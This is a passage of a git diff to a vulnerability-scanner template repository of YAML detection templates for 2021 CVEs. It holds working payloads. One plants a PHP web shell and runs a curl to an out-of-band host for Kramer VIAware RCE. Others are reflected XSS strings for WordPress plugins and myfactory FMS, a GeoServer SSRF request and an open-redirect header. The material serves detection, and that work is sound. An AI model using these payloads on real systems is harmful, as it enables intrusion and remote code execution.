- "Set-Cookie: JSESSIONID=" + part: header + + - type: word + words: + - "Version Information -" + - "openam/ccversion/Masthead.jsp" + part: body + condition: or + +# Enhanced by mp on 2022/05/02 diff --git a/poc/cve/cve-2021-36356.yaml b/poc/cve/cve-2021-36356.yaml new file mode 100644 index 0000000000..8dbb5f01fd --- /dev/null +++ b/poc/cve/cve-2021-36356.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-36356 + +info: + name: Kramer VIAware - Remote Code Execution + author: gy741 + severity: critical + description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. + remediation: | + Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. + reference: + - https://www.exploit-db.com/exploits/50856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 + - https://write-up.github.io/kramerav/ + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36356 + cwe-id: CWE-434 + epss-score: 0.90558 + epss-percentile: 0.98752 + cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: kramerav + product: viaware + tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav +variables: + useragent: "{{rand_base(6)}}" + +http: + - raw: + - | + POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php + - | + GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - http + + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" +# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-38702.yaml b/poc/cve/cve-2021-38702.yaml index 3f60770f60..4c1fde131c 100644 --- a/poc/cve/cve-2021-38702.yaml +++ b/poc/cve/cve-2021-38702.yaml @@ -4,13 +4,14 @@ info: name: Cyberoam NetGenie Cross-Site Scripting author: geeknik severity: medium - description: "Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php." + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. reference: - https://seclists.org/fulldisclosure/2021/Aug/20 - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 tags: cve,cve2021,cyberoam,netgenie,xss,router diff --git a/poc/cve/cve-2021-38704.yaml b/poc/cve/cve-2021-38704.yaml index 55e5fed1c9..cfe5058168 100644 --- a/poc/cve/cve-2021-38704.yaml +++ b/poc/cve/cve-2021-38704.yaml @@ -8,13 +8,14 @@ info: reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 - metadata: - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" + - https://github.com/judsonmitchell/ClinicCases/releases classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-38704 cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases requests: diff --git a/poc/cve/cve-2021-39320.yaml b/poc/cve/cve-2021-39320.yaml new file mode 100644 index 0000000000..6e634f1073 --- /dev/null +++ b/poc/cve/cve-2021-39320.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-39320 + +info: + name: WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + reference: + - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39320 + cwe-id: CWE-79 + tags: wordpress,xss,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/cve-2021-39322.yaml b/poc/cve/cve-2021-39322.yaml index 1974b6aa52..80b3ada7a5 100644 --- a/poc/cve/cve-2021-39322.yaml +++ b/poc/cve/cve-2021-39322.yaml @@ -4,13 +4,15 @@ info: name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium - description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path." + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. reference: - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-39322 cwe-id: CWE-79 tags: wordpress,cve,cve2021,wp-plugin,authenticated diff --git a/poc/cve/cve-2021-39327.yaml b/poc/cve/cve-2021-39327.yaml index 0e348c2036..f78e4f755b 100644 --- a/poc/cve/cve-2021-39327.yaml +++ b/poc/cve/cve-2021-39327.yaml @@ -4,17 +4,17 @@ info: name: WordPress BulletProof Security 5.1 Information Disclosure author: geeknik severity: medium - description: "The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1." + description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. reference: - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 - tags: cve,cve2021,wordpress,exposures classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-39327 cwe-id: CWE-200 + tags: cve,cve2021,wordpress,exposures requests: - method: GET diff --git a/poc/cve/cve-2021-39433.yaml b/poc/cve/cve-2021-39433.yaml index 6811778843..bbc07f241b 100644 --- a/poc/cve/cve-2021-39433.yaml +++ b/poc/cve/cve-2021-39433.yaml @@ -4,15 +4,16 @@ info: name: BIQS IT Biqs-drive v1.83 Local File Inclusion author: Veshraj severity: high - description: "A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user." + description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. reference: - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433 - tags: lfi,biqsdrive,cve,cve2021 + - https://biqs-drive.be/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-39433 + tags: lfi,biqsdrive,cve,cve2021 requests: - method: GET diff --git a/poc/cve/cve-2021-40539.yaml b/poc/cve/cve-2021-40539.yaml index 5315ae83ea..685aa50014 100644 --- a/poc/cve/cve-2021-40539.yaml +++ b/poc/cve/cve-2021-40539.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-287 - tags: cve,cve2021,rce,ad,intrusive,manageengine,kev + tags: cve,cve2021,rce,ad,intrusive,manageengine requests: diff --git a/poc/cve/cve-2021-40542.yaml b/poc/cve/cve-2021-40542.yaml index dad744396d..247ec475a8 100644 --- a/poc/cve/cve-2021-40542.yaml +++ b/poc/cve/cve-2021-40542.yaml @@ -1,17 +1,18 @@ id: CVE-2021-40542 info: - name: Opensis-Classic 8.0 Reflected Cross-Site Scripting + name: Opensis-Classic 8.0 - Reflected Cross-Site Scripting author: alph4byt3 severity: medium - description: Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. + description: | + Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. reference: - https://github.com/OS4ED/openSIS-Classic/issues/189 - https://nvd.nist.gov/vuln/detail/CVE-2021-40542 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-38704 + cvss-score: 6.1 + cve-id: CVE-2021-40542 cwe-id: CWE-79 tags: xss,cve,cve2021,opensis diff --git a/poc/cve/cve-2021-40822.yaml b/poc/cve/cve-2021-40822.yaml index a5f8bde585..cb5258cfc8 100644 --- a/poc/cve/cve-2021-40822.yaml +++ b/poc/cve/cve-2021-40822.yaml @@ -2,46 +2,58 @@ id: CVE-2021-40822 info: name: Geoserver - Server-Side Request Forgery - author: For3stCo1d + author: For3stCo1d,aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. + remediation: | + Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability. reference: - https://gccybermonks.com/posts/cve-2021-40822/ - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3 - https://github.com/geoserver/geoserver/releases - https://nvd.nist.gov/vuln/detail/CVE-2021-40822 + - https://osgeo-org.atlassian.net/browse/GEOS-10229 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 + epss-score: 0.68366 + epss-percentile: 0.97892 + cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: osgeo + product: geoserver + shodan-query: title:"GeoServer" fofa-query: app="GeoServer" - verified: "true" - tags: cve,cve2021,ssrf,geoserver + tags: cve2021,cve,ssrf,geoserver,osgeo -requests: +http: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: {{Hostname}} + Host: oast.pro Content-Type: application/x-www-form-urlencoded - form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= + form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password= matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" + - "Interactsh" - type: word + part: header words: - - "" + - "text/html" - type: status status: - 200 - -# Enhanced by mp on 2022/06/30 +# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-41192.yaml b/poc/cve/cve-2021-41192.yaml index c1d124c9c0..dba2a044ba 100644 --- a/poc/cve/cve-2021-41192.yaml +++ b/poc/cve/cve-2021-41192.yaml @@ -4,19 +4,19 @@ info: name: Redash Setup Configuration - Default Secrets Disclosure author: bananabr severity: medium - description: "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value." + description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. reference: - https://hackerone.com/reports/1380121 - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - metadata: - shodan-query: http.favicon.hash:698624197 - tags: cve,cve2021,redash,auth-bypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2021-41192 cwe-id: CWE-1188 + metadata: + shodan-query: http.favicon.hash:698624197 + tags: cve,cve2021,redash,auth-bypass requests: - method: GET diff --git a/poc/cve/cve-2021-41266.yaml b/poc/cve/cve-2021-41266.yaml index 9819fab0ae..5aed4ef4ea 100644 --- a/poc/cve/cve-2021-41266.yaml +++ b/poc/cve/cve-2021-41266.yaml @@ -6,17 +6,19 @@ info: severity: critical description: | MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. - remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token." reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 - https://github.com/minio/console/pull/1217 - tags: cve,cve2021,minio classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 + remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside + the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes + service account token.' + tags: cve,cve2021,minio requests: - raw: diff --git a/poc/cve/cve-2021-41467.yaml b/poc/cve/cve-2021-41467.yaml index 3bb1e8ed25..d82d191d05 100644 --- a/poc/cve/cve-2021-41467.yaml +++ b/poc/cve/cve-2021-41467.yaml @@ -8,14 +8,14 @@ info: reference: - https://github.com/hjue/JustWriting/issues/106 - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 + - https://github.com/hjue/JustWriting/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-41467 cwe-id: CWE-79 tags: cve,cve2021,justwriting,xss - requests: - method: GET path: diff --git a/poc/cve/cve-2021-41648.yaml b/poc/cve/cve-2021-41648.yaml index 2708382c24..3df8e64753 100644 --- a/poc/cve/cve-2021-41648.yaml +++ b/poc/cve/cve-2021-41648.yaml @@ -9,12 +9,12 @@ info: - https://github.com/MobiusBinary/CVE-2021-41648 - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 - tags: cve,cve2021,sqli,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 + tags: cve,cve2021,sqli,injection requests: - method: POST diff --git a/poc/cve/cve-2021-42063.yaml b/poc/cve/cve-2021-42063.yaml index e9cc437e9a..bc30679e1d 100644 --- a/poc/cve/cve-2021-42063.yaml +++ b/poc/cve/cve-2021-42063.yaml @@ -11,16 +11,12 @@ info: - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html - https://twitter.com/MrTuxracer/status/1505934549217382409 - https://nvd.nist.gov/vuln/detail/CVE-2021-42063 - metadata: - shodan-query: - - 'SAP NetWeaver Application Server' - - 'http.component:"SAP"' - tags: cve,cve2021,sap,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-42063 cwe-id: CWE-79 + tags: cve,cve2021,sap,xss requests: - method: GET diff --git a/poc/cve/cve-2021-42565.yaml b/poc/cve/cve-2021-42565.yaml index f860c4f25f..bd4c2bc4c6 100644 --- a/poc/cve/cve-2021-42565.yaml +++ b/poc/cve/cve-2021-42565.yaml @@ -1,16 +1,17 @@ id: CVE-2021-42565 info: - author: madrobot name: myfactory FMS - Reflected Cross-Site Scripting + author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42565 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-42565 cwe-id: CWE-79 tags: cve,cve2021,myfactory,xss diff --git a/poc/cve/cve-2021-42566.yaml b/poc/cve/cve-2021-42566.yaml new file mode 100644 index 0000000000..2ba8f6ef60 --- /dev/null +++ b/poc/cve/cve-2021-42566.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-42566 + +info: + name: myfactory FMS - Reflected Cross-Site Scripting + author: madrobot + severity: medium + description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42566 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 + - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-42566 + cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/cve-2021-43062.yaml b/poc/cve/cve-2021-43062.yaml index 4be91bc361..03e6b3cd1f 100644 --- a/poc/cve/cve-2021-43062.yaml +++ b/poc/cve/cve-2021-43062.yaml @@ -9,9 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-43062 - https://www.fortiguard.com/psirt/FG-IR-21-185 - https://www.exploit-db.com/exploits/50759 + - https://fortiguard.com/advisory/FG-IR-21-185 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-43062 cwe-id: CWE-79 tags: cve,cve2021,fortimail,xss,fortinet diff --git a/poc/cve/cve-2021-43495.yaml b/poc/cve/cve-2021-43495.yaml index 82dd1cdab5..94f1e94c2e 100644 --- a/poc/cve/cve-2021-43495.yaml +++ b/poc/cve/cve-2021-43495.yaml @@ -4,16 +4,17 @@ info: name: AlquistManager Local File Inclusion author: pikpikcu severity: high - description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. + description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical + secrets stored anywhere on the system and can significantly aid in getting remote code access. reference: - https://github.com/AlquistManager/alquist/issues/43 - https://nvd.nist.gov/vuln/detail/CVE-2021-43495 - tags: cve,cve2021,lfi,alquist classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-43495 cwe-id: CWE-22 + tags: cve,cve2021,lfi,alquist requests: - method: GET diff --git a/poc/cve/cve-2021-43496.yaml b/poc/cve/cve-2021-43496.yaml index 8314bb7660..4b96e8518c 100644 --- a/poc/cve/cve-2021-43496.yaml +++ b/poc/cve/cve-2021-43496.yaml @@ -9,7 +9,7 @@ info: - https://github.com/varun-suresh/Clustering/issues/12 - https://nvd.nist.gov/vuln/detail/CVE-2021-43496 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43496 cwe-id: CWE-22 diff --git a/poc/cve/cve-2021-44077.yaml b/poc/cve/cve-2021-44077.yaml new file mode 100644 index 0000000000..7353160d48 --- /dev/null +++ b/poc/cve/cve-2021-44077.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-44077 + +info: + name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution + author: Adam Crosser,gy741 + severity: critical + description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine ServiceDesk Plus. + reference: + - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a + - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ + - https://github.com/horizon3ai/CVE-2021-44077 + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb + - https://nvd.nist.gov/vuln/detail/CVE-2021-44077 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-44077 + cwe-id: CWE-306 + epss-score: 0.97367 + epss-percentile: 0.99895 + cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_servicedesk_plus + tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp + +http: + - method: GET + path: + - "{{BaseURL}}/RestAPI/ImportTechnicians" + + matchers-condition: and + matchers: + - type: word + words: + - '
' + attack: pitchfork + matchers-condition: and matchers: - type: word - part: body - condition: and + part: header_2 words: - - 'Redirecting...' - - '

Redirecting...' + - 'session' + - type: word - part: header + part: body_3 words: - - 'session' - - type: status - status: - - 302 + - 'DashboardFilterStateRestApi' -# Enhanced by mp on 2022/03/02 + extractors: + - type: regex + name: csrf_token + group: 1 + regex: + - 'name="csrf_token" type="hidden" value="(.*)"' + internal: true + part: body +# digest: 4b0a004830460221009d940f8a0982384e8bd0f850c06b5915e9aa203c5b4669b9d3b9e045fcc843a0022100dbed9cb50c63e171e7e20611b8677090df662b13a2be3d56ee8b3c8c17ae7bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-44521.yaml b/poc/cve/cve-2021-44521.yaml index 0bd987b8a1..5e9827d39f 100644 --- a/poc/cve/cve-2021-44521.yaml +++ b/poc/cve/cve-2021-44521.yaml @@ -3,18 +3,19 @@ id: CVE-2021-44521 info: name: Apache Cassandra Load UDF RCE author: Y4er - description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE." severity: critical + description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' reference: - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ - tags: cve,cve2021,network,rce,apache,cassandra + - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.10 + cvss-score: 9.1 cve-id: CVE-2021-44521 cwe-id: CWE-94 + tags: cve,cve2021,network,rce,apache,cassandra network: - inputs: diff --git a/poc/cve/cve-2021-44528.yaml b/poc/cve/cve-2021-44528.yaml index 6ef47dee42..e17fc811d7 100644 --- a/poc/cve/cve-2021-44528.yaml +++ b/poc/cve/cve-2021-44528.yaml @@ -5,29 +5,42 @@ info: author: geeknik severity: medium description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + impact: | + This vulnerability can lead to phishing attacks, where users are tricked into visiting malicious websites and disclosing sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware. reference: - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 + - https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815 + - https://www.debian.org/security/2023/dsa-5372 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - tags: cve,cve2021,redirect + epss-score: 0.00087 + epss-percentile: 0.36061 + cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rubyonrails + product: rails + tags: cve2021,cve,seclists,redirect,rubyonrails -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Forwarded-Host: //example.com + X-Forwarded-Host: //interact.sh matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - 